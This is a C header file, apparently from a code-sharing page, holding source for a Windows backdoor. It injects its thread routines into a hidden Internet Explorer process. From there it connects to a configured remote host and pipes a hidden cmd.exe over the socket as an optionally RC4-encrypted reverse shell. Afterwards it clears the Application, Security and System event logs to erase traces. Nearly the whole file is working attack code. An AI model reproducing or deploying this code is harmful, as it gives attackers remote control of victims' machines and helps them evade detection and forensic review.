📄 inject.h
字号:
// WRp->pMBox= (tMBox)WRp->pGetProcAddress(WRp->husr32,WRp->szMessageBoxA );
//WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
WRp->precv=(trecv)WRp->pGetProcAddress(WRp->hwinsock, WRp->szrecv );
WRp->pWriteFile=(tWriteFile)WRp->pGetProcAddress(WRp->hk32, WRp->szWriteFile );
// WRp->plstrcmpi=(tlstrcmpi)WRp->pGetProcAddress(WRp->hk32, WRp->szlstrcmpi );
WRp->pExitThread=(tExitThread)WRp->pGetProcAddress(WRp->hk32, WRp->szExitThread );
// WRp->pMBox(0,WRp->szWs232,WRp->szWs232,MB_OK);
if((WRp->pExitThread==0)||(WRp->pWriteFile==0)||(WRp->precv==0))
return 1;
//WRp->hAdvapi =WRp->pLoadLibrary( WRp->szAdvapi32);
WRp->pCryptAcquireContext=(tCryptAcquireContext)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptAcquireContext);
WRp->pCryptCreateHash=(tCryptCreateHash)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptCreateHash);
WRp->pCryptHashData=(tCryptHashData)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptHashData);
WRp->pCryptDeriveKey=(tCryptDeriveKey)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDeriveKey);
WRp->pCryptDecrypt=(tCryptDecrypt)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDecrypt);
WRp->pCryptDestroyKey=(tCryptDestroyKey)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptDestroyKey);
WRp->pCryptDestroyHash=(tCryptDestroyHash)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDestroyHash);
WRp->pCryptReleaseContext=(tCryptReleaseContext)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptReleaseContext);
WRp->plstrlen=(tlstrlen)WRp->pGetProcAddress(WRp->hk32,WRp->szlstrlen);
/////////////////
while (1)
{
//WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
WRp->RcvCnt=WRp->precv(WRp->Session->ClientSocket, (char *)WRp->Buff, sizeof(WRp->Buff), 0);
//if((WRp->RcvCnt==0)||(WRp->RcvCnt==SOCKET_ERROR)) break;
//if((WRp->RcvCnt==0)) break;
if(WRp->Encrypt){
//decr start
if (WRp->pCryptAcquireContext(&WRp->hProv, NULL,WRp->CSP, PROV_RSA_FULL, 0))
{
if (WRp->pCryptCreateHash(WRp->hProv, CALG_MD5, 0, 0, &WRp->hHash))
{
WRp->dwLength =WRp->plstrlen(WRp->szLocalPassword);
// WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
if (WRp->pCryptHashData(WRp->hHash, (BYTE *)WRp->szLocalPassword, WRp->dwLength, 0))
{
// WRp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
if (WRp->pCryptDeriveKey(WRp->hProv, CALG_RC4, WRp->hHash, CRYPT_EXPORTABLE, &WRp->hKey))
{
WRp->dwLength =WRp->RcvCnt;
WRp->pCryptDecrypt(WRp->hKey, 0, TRUE, 0, (BYTE *)WRp->Buff,&WRp->dwLength);
WRp->pCryptDestroyKey(WRp->hKey);
//WRp->pMBox(0,WRp->Buff,WRp->Buff,MB_OK);
}
}
WRp->pCryptDestroyHash(WRp->hHash);
}
WRp->pCryptReleaseContext(WRp->hProv, 0);
}//decr end
}
WRp->dwLength=WRp->RcvCnt;
//WRp->pMBox(0,(char *)WRp->Buff,(char *)WRp->Buff,MB_OK);
if (! WRp->pWriteFile(WRp->Session->WritePipeHandle,WRp->Buff ,WRp->dwLength ,&WRp->BytesWritten, NULL))
{
// WRp->pMBox(0,(char *)WRp->Buff,(char *)WRp->Buff,MB_OK);
break;
}
//if (WRp->plstrcmpi(WRp->Buffer, "exit\r\n") == 0) WRp->pExitThread(0);
}
WRp->pExitThread(0);
return 0;
}
static void EndISessionWriteShellThread(void)
{
}
DWORD WINAPI IConnectThread(ConnectParam *Cp)
{
// Cp->husr32 = Cp->pLoadLibrary(Cp->szuser32dll);
Cp->hwinsock = Cp->pLoadLibrary(Cp->szWs232 );
Cp->hk32 =Cp->pLoadLibrary( Cp->szkernel32dll);
Cp->hAdvapi =Cp->pLoadLibrary( Cp->szAdvapi32);
if((Cp->hAdvapi==0)||(Cp->hk32==0)||(Cp->hk32==0)) return 1;
// Cp->pMBox= (tMBox)Cp->pGetProcAddress(Cp->husr32,Cp->szMessageBoxA );
Cp->pWSAStartup=(tWSAStartup)Cp->pGetProcAddress( Cp->hwinsock, Cp->szWSAStartup);
Cp->psocket=(tsocket)Cp->pGetProcAddress(Cp->hwinsock, Cp->szsocket );
Cp->pgethostbyname=(tgethostbyname)Cp->pGetProcAddress(Cp->hwinsock, Cp->szgethostbyname );
Cp->pconnect=(tconnect)Cp->pGetProcAddress(Cp->hwinsock, Cp->szconnect );
Cp->phtons=(thtons)Cp->pGetProcAddress(Cp->hwinsock, Cp->szhtons );
Cp->pinet_addr=(tinet_addr)Cp->pGetProcAddress(Cp->hwinsock, Cp->szinet_addr );
//cmd
Cp->pclosesocket=(tclosesocket)Cp->pGetProcAddress(Cp->hwinsock, Cp->szclosesocket );
Cp->pCreatePipe=(tCreatePipe)Cp->pGetProcAddress(Cp->hk32, Cp->szCreatePipe );
Cp->pDuplicateHandle=(tDuplicateHandle)Cp->pGetProcAddress(Cp->hk32, Cp->szDuplicateHandle );
Cp->pCreateProcess=(tCreateProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szCreateProcess );
Cp->pCreatePipe=(tCreatePipe)Cp->pGetProcAddress(Cp->hk32, Cp->szCreatePipe );
Cp->pCloseHandle=(tCloseHandle)Cp->pGetProcAddress(Cp->hk32, Cp->szCloseHandle );
Cp->pCreateThread=(tCreateThread)Cp->pGetProcAddress(Cp->hk32, Cp->szCreateThread );
Cp->pWaitForMultipleObjects=(tWaitForMultipleObjects)Cp->pGetProcAddress(Cp->hk32, Cp->szWaitForMultipleObjects);
Cp->pTerminateThread=(tTerminateThread)Cp->pGetProcAddress(Cp->hk32, Cp->szTerminateThread );
Cp->pTerminateProcess=(tTerminateProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szTerminateProcess );
Cp->pDisconnectNamedPipe=(tDisconnectNamedPipe)Cp->pGetProcAddress(Cp->hk32, Cp->szDisconnectNamedPipe );
Cp->pGetCurrentProcess=(tGetCurrentProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szGetCurrentProcess );
// Cp->pPostQuitMessage=(tPostQuitMessage)Cp->pGetProcAddress(Cp->husr32, Cp->szPostQuitMessage);
Cp->pExitProcess=(tExitProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szExitProcess);
if((Cp->pCreateProcess==0)||(Cp->pclosesocket==0)||(Cp->pCreatePipe==0)||(Cp->pDuplicateHandle==0)||(Cp->pDisconnectNamedPipe==0)||(Cp->pTerminateProcess==0))
return 1;
if((Cp->pCreatePipe==0)||(Cp->pCloseHandle==0)||(Cp->pCreateThread==0)||(Cp->pWaitForMultipleObjects==0)||(Cp->pTerminateThread==0))
return 1;
if((Cp->pWSAStartup==0)||(Cp->phtons==0)||(Cp->pconnect==0)||(Cp->pgethostbyname==0)||(Cp->psocket==0))
return 1;
Cp->pRegisterEventSource=(tRegisterEventSource)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szRegisterEventSource);
Cp->pClearEventLog=(tClearEventLog)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szClearEventLog);
Cp->pDeregisterEventSource=(tDeregisterEventSource)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szDeregisterEventSource);
if((Cp->pClearEventLog==0)) return 1;
if((Cp->pRegisterEventSource==0)) return 1;
if((Cp->pDeregisterEventSource==0)) return 1;
//Cp->pMBox(0,Cp->host,Cp->szcmdexe,MB_OK);
/////////////////
//Cp->pMBox(0,Cp->host,Cp->szcmdexe,MB_OK);
Cp->pWSAStartup(MAKEWORD(2,1),&Cp->wsaData);
Cp->client = Cp->psocket(AF_INET, SOCK_STREAM, 0);
Cp->lpHostEntry =Cp->pgethostbyname(Cp->host);
//if(Cp->lpHostEntry==NULL) Cp->pMBox(0,Cp->szconnect,"1",MB_OK);
Cp->local.sin_family=AF_INET;
Cp->local.sin_addr=*((LPIN_ADDR)*(Cp->lpHostEntry->h_addr_list));
//Cp->local.sin_addr.s_addr=Cp->pinet_addr(Cp->host);
Cp->local.sin_port=Cp->phtons((u_short)Cp->port);
if(Cp->pconnect(Cp->client, (SOCKADDR*)&Cp->local, sizeof(Cp->local))==0){
// Cp->pMBox(0,Cp->szconnect,"1",MB_OK);
////////////////////////////////////start shell
Cp->SecurityAttributes.nLength = sizeof(Cp->SecurityAttributes);
Cp->SecurityAttributes.lpSecurityDescriptor = NULL;
Cp->SecurityAttributes.bInheritHandle = TRUE;
Cp->pCreatePipe(&Cp->Session.ReadPipeHandle, &Cp->ShellStdoutPipe, &Cp->SecurityAttributes, 0);
Cp->pCreatePipe(&Cp->ShellStdinPipe, &Cp->Session.WritePipeHandle,&Cp->SecurityAttributes, 0);
Cp->Session.ProcessHandle =NULL;
Cp->si.cb = sizeof(STARTUPINFO);
Cp->si.lpReserved = NULL;
Cp->si.lpTitle = NULL;
Cp->si.lpDesktop = NULL;
Cp->si.dwX = Cp->si.dwY = Cp->si.dwXSize = Cp->si.dwYSize = 0L;
Cp->si.wShowWindow = SW_HIDE;
Cp->si.lpReserved2 = NULL;
Cp->si.cbReserved2 = 0;
Cp->si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
Cp->si.hStdInput =Cp->ShellStdinPipe;
Cp->si.hStdOutput =Cp->ShellStdoutPipe;
// Cp->pMBox(0,Cp->szDuplicateHandle,"1",MB_OK);
Cp->pDuplicateHandle(Cp->pGetCurrentProcess(), Cp->ShellStdoutPipe,Cp->pGetCurrentProcess(), &Cp->si.hStdError,DUPLICATE_SAME_ACCESS, TRUE, 0);
if (Cp->pCreateProcess(NULL, Cp->szcmdexe, NULL, NULL, TRUE, 0, NULL, NULL,&Cp->si, &Cp->ProcessInformation))
{
// Cp->pMBox(0,Cp->szcmdexe,"1",MB_OK);
Cp->Session.ProcessHandle =Cp->ProcessInformation.hProcess;
Cp->pCloseHandle(Cp->ProcessInformation.hThread);
}
//Cp->pMBox(0,Cp->szCreateProcess,Cp->szCreateProcess,MB_OK);
Cp->pCloseHandle(Cp->ShellStdinPipe);
Cp->pCloseHandle(Cp->ShellStdoutPipe);
Cp->SecurityAttributes.nLength = sizeof(Cp->SecurityAttributes);
Cp->SecurityAttributes.lpSecurityDescriptor = NULL;
Cp->SecurityAttributes.bInheritHandle = FALSE;
Cp->Session.ClientSocket =Cp->client;
if(Cp->Encrypt){
Cp->writeshellpar->Encrypt=TRUE;
Cp->preadshellpar->Encrypt=TRUE;
}
else{
Cp->writeshellpar->Encrypt=FALSE;
Cp->preadshellpar->Encrypt=FALSE;
}
Cp->writeshellpar->Session=&Cp->Session;
Cp->preadshellpar->Session=&Cp->Session;
Cp->Session.WriteShellThreadHandle=Cp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(Cp->pISessionWriteShellThread), (LPVOID) Cp->writeshellpar,0,&Cp->ThreadId);
Cp->Session.ReadShellThreadHandle=Cp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(Cp->pISessionReadShellThread), (LPVOID)Cp->preadshellpar,0,&Cp->ThreadId);
if((Cp->Session.WriteShellThreadHandle==NULL)||(Cp->Session.ReadShellThreadHandle==NULL)) return 0;
//Cp->pMBox(0,Cp->szcmdexe,"1",MB_OK);
Cp->HandleArray[0] =Cp->Session.ReadShellThreadHandle;
Cp->HandleArray[1] =Cp->Session.WriteShellThreadHandle;
Cp->HandleArray[2] =Cp->Session.ProcessHandle;
Cp->i =Cp->pWaitForMultipleObjects(3, Cp->HandleArray, FALSE, 0xffffffff);
switch (Cp->i) {
case WAIT_OBJECT_0 + 0:
// Cp->pMBox(0,Cp->szTerminateThread,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.WriteShellThreadHandle, 0);
Cp->pTerminateProcess(Cp->Session.ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 1:
// Cp->pMBox(0,Cp->szTerminateProcess,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.ReadShellThreadHandle, 0);
Cp->pTerminateProcess(Cp->Session.ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 2:
// Cp->pMBox(0,Cp->szclosesocket,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.WriteShellThreadHandle, 0);
Cp->pTerminateThread(Cp->Session.ReadShellThreadHandle, 0);
break;
default:
// Cp->pMBox(0,Cp->szDisconnectNamedPipe,"1",MB_OK);
break;
}
Cp->pclosesocket(Cp->Session.ClientSocket);
Cp->pDisconnectNamedPipe(Cp->Session.ReadPipeHandle);
Cp->pCloseHandle(Cp->Session.ReadPipeHandle);
Cp->pDisconnectNamedPipe(Cp->Session.WritePipeHandle);
Cp->pCloseHandle(Cp->Session.WritePipeHandle);
Cp->pCloseHandle(Cp->Session.ReadShellThreadHandle);
Cp->pCloseHandle(Cp->Session.WriteShellThreadHandle);
Cp->pCloseHandle(Cp->Session.ProcessHandle);
//Cp->pMBox(0,Cp->szPostQuitMessage,"1",MB_OK);
//Cp->pPostQuitMessage(0);
//Clearing all Event Logs...
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szApplications);
if(Cp->hEvent != NULL)
{
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szSecu);
if(Cp->hEvent != NULL){
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szSystem);
if(Cp->hEvent != NULL){
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
/////////////////
//return 1;
////////////////////////////////////end shell
}
//else Cp->pMBox(0,Cp->szconnect,Cp->szconnect,MB_OK);
Cp->pExitProcess(0);
//Cp->pTerminateProcess(Cp->pGetCurrentProcess(),1);
// Cp->pMBox(0,"Cp->szcmdexe","Cp->szconnect",MB_OK);
return 0;
}
static void EndIConnectThread(void)
{
}
DWORD WINAPI IStartInjectIEThread(IEParam *IIEp)
{
// IIEp->husr32 = IIEp->pLoadLibrary(IIEp->szuser32dll);
IIEp->hk32 =IIEp->pLoadLibrary( IIEp->szkernel32dll);
// IIEp->pMBox= (tMBox)IIEp->pGetProcAddress(IIEp->husr32,IIEp->szMessageBoxA );
IIEp->pCreateRemoteThread = (tCreateRemoteThread)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szCreateRemoteThread);
IIEp->pWriteProcessMemory=(tWriteProcessMemory)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szWriteProcessMemory );
IIEp->pVirtualAllocEx=(tVirtualAllocEx)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szVirtualAllocEx );
IIEp->pCreateProcess=(tCreateProcess)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szCreateProcess );
IIEp->pOpenProcess=(tOpenProcess)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szOpenProcess);
if(IIEp->pVirtualAllocEx==NULL) return 0;
//IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);
IIEp->si.cb = sizeof(STARTUPINFO);
IIEp->si.lpReserved = NULL;
IIEp->si.lpTitle = NULL;
IIEp->si.lpDesktop = NULL;
IIEp->si.dwX = IIEp->si.dwY = IIEp->si.dwXSize = IIEp->si.dwYSize = 0L;
IIEp->si.wShowWindow = SW_HIDE;
IIEp->si.lpReserved2 = NULL;
IIEp->si.cbReserved2 = 0;
IIEp->si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
if (!IIEp->pCreateProcess(NULL,IIEp->sziexplorerexe, NULL, NULL, TRUE, 0, NULL, NULL,&IIEp->si, &IIEp->ProcessInformation)) return 0;
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->ie=IIEp->pOpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE,IIEp->ProcessInformation.dwProcessId );
if(IIEp->ie == 0) return 0;
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->pIConnectThread=(tIConnectThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iIConnectThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
IIEp->pISessionWriteShellThread=(tISessionWriteShellThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iISessionWriteShellThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
IIEp->pISessionReadShellThread=(tISessionReadShellThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iISessionReadShellThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->pReadShellTParam = (ReadShellTParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(ConnectParam), MEM_COMMIT, PAGE_READWRITE );
IIEp->pWriteShellTParam = (WriteShellTParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(WriteShellTParam), MEM_COMMIT, PAGE_READWRITE );
IIEp->pConnectParam = (ConnectParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(ReadShellTParam), MEM_COMMIT, PAGE_READWRITE );
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->lclpConnectParam->pISessionWriteShellThread=IIEp->pISessionWriteShellThread;
IIEp->lclpConnectParam->writeshellpar =IIEp->pWriteShellTParam;
IIEp->lclpConnectParam->pISessionReadShellThread=IIEp->pISessionReadShellThread;
IIEp->lclpConnectParam->preadshellpar=IIEp->pReadShellTParam;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pIConnectThread,IIEp->plclIConnectThread , IIEp->iIConnectThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pISessionWriteShellThread,IIEp->plclISessionWriteShellThread, IIEp->iISessionWriteShellThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pISessionReadShellThread,IIEp->plclISessionReadShellThread, IIEp->iISessionReadShellThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pConnectParam,IIEp->lclpConnectParam,sizeof(ConnectParam), 0 ) )return 0;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -